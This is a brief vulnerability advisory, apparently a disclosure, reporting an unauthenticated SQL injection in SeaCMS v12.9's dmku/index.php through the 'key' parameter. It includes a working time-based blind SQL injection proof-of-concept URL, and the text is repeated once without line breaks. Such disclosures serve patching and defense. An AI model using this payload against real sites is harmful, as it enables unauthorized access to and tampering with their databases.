Summary
SeaCMS v12.9 suffers from an unauthenticated SQL injection vulnerability in the dmku/index.php file where user-supplied data is used directly in an SQL query without proper sanitization.
No filtering found in source code
Proof of Concept (PoC)http(s)://ip:port//js/player/dmplayer/dmku/?ac=so&key=1&type=listhttp(s)://ip:port//js/player/dmplayer/dmku/?ac=so&key=1' AND (SELECT 1806 FROM (SELECT(SLEEP(5)))npVX)-- OXgJ&type=listImpact
This vulnerability allows unauthenticated remote attackers to inject arbitrary SQL commands through the "key" parameter.
Summary SeaCMS v12.9 suffers from an unauthenticated SQL injection vulnerability in the dmku/index.php file where user-supplied data is used directly in an SQL query without proper sanitization. No filtering found in source code Proof of Concept (PoC)
http(s)://ip:port//js/player/dmplayer/dmku/?ac=so&key=1&type=list
http(s)://ip:port//js/player/dmplayer/dmku/?ac=so&key=1' AND (SELECT 1806 FROM (SELECT(SLEEP(5)))npVX)-- OXgJ&type=list
Impact This vulnerability allows unauthenticated remote attackers to inject arbitrary SQL commands through the "key" parameter.